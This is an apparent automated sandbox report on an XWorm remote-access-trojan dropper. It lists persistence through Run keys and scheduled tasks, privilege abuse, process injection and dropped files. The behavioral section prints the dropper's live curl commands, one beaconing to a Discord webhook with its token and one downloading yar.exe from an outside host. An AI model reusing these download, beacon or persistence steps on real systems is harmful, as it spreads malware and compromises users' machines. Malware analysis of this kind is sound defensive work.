Malware Analysis Report

2024-11-16 13:37

Sample ID 240530-djtbascb4x
Target VM_Dropper.exe
SHA256 de9ea4b92ab39c4ff711fb80136eb53553d8932620a1794e41354bb5fb4060bc
Tags
xworm discovery persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

de9ea4b92ab39c4ff711fb80136eb53553d8932620a1794e41354bb5fb4060bc

Threat Level: Known bad

The file VM_Dropper.exe was found to be: Known bad.

Malicious Activity Summary

xworm discovery persistence rat trojan

Suspicious use of NtCreateProcessExOtherParentProcess

Xworm

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-30 03:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 03:02

Reported

2024-05-30 03:07

Platform

win7-20240508-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe

"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe

Network

N/A

Files

memory/1500-0-0x000000007440E000-0x000000007440F000-memory.dmp

memory/1500-1-0x0000000001070000-0x0000000001096000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-30 03:02

Reported

2024-05-30 03:08

Platform

win10v2004-20240226-en

Max time kernel

126s

Max time network

309s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5328 created 3296 N/A C:\Windows\system32\WerFault.exe C:\Windows\system32\taskmgr.exe

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3068 created 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 5232 created 3296 N/A C:\Windows\System32\svchost.exe C:\Windows\system32\taskmgr.exe

Xworm

trojan rat xworm

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\yar.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\penisware.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\calc.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yar = "C:\\Users\\Admin\\AppData\\Roaming\\yar.exe" C:\Users\Admin\yar.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penisware = "C:\\Users\\Admin\\AppData\\Local\\penisware.exe" C:\Users\Admin\penisware.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svvhost = "C:\\Users\\Admin\\AppData\\Roaming\\svvhost.exe" C:\Users\Admin\calc.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\penisware.exe C:\Users\Admin\penisware.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf C:\Users\Admin\sachost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\svvhost.exe C:\Users\Admin\calc.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\yar.exe C:\Users\Admin\yar.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3068 set thread context of 3012 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Users\Admin\penisballs.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\yar.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\calc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\penisware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Users\Admin\penisballs.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\penisware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\penisware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\yar.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Users\Admin\penisballs.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\calc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\penisware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\yar.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\sachost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisballs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\physics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\yar.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\calc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\calc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\yar.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\sachost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\physics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\calc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisballs.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\yar.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\calc.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: 31 N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
